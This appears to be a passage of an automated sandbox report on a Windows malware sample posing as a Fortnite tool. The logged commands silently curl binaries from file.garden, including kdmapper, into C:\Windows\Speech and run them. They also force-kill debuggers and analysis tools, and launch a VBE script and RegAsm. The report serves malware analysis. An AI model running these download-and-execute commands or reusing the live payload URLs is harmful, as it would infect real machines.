Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\sc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\sc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerSvc.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Dbg64.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerUI.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerSvc.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebugger.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\sc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerUI.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Dbg32.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Dbg32.exe")
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: UY9hUZn4CQ.exe

ReversingLabs: Detection: 34%

Source: unknown	Process created: C:\Users\user\Desktop\UY9hUZn4CQ.exe "C:\Users\user\Desktop\UY9hUZn4CQ.exe"
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c color 7
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.bin --output C:\Windows\Speech\imxyvi.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerSvc.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.bin --output C:\Windows\Speech\imxyvi.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im Ida64.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im OllyDbg.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\Speech\imxyvi.exe "C:\Windows\Speech\imxyvi.exe"
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im Dbg64.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe"
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
Source: C:\Windows\Speech\physmeme.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im Dbg32.exe
Source: C:\Windows\System32\taskkill.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 2084 -ip 2084
Source: C:\Windows\Speech\imxyvi.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2084 -s 380
Source: C:\Windows\Speech\physmeme.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\Speech\kdmapper.exe "C:\Windows\Speech\kdmapper.exe"
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/build.bin --output C:\Windows\Speech\rtcore64.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/build.bin --output C:\Windows\Speech\rtcore64.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T
Source: C:\Windows\Speech\kdmapper.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe"
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\Speech\rtcore64.exe "C:\Windows\Speech\rtcore64.exe"
Source: C:\Windows\Speech\rtcore64.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker" /IM /F /T >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\Speech\rtcore64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerSvc.exe
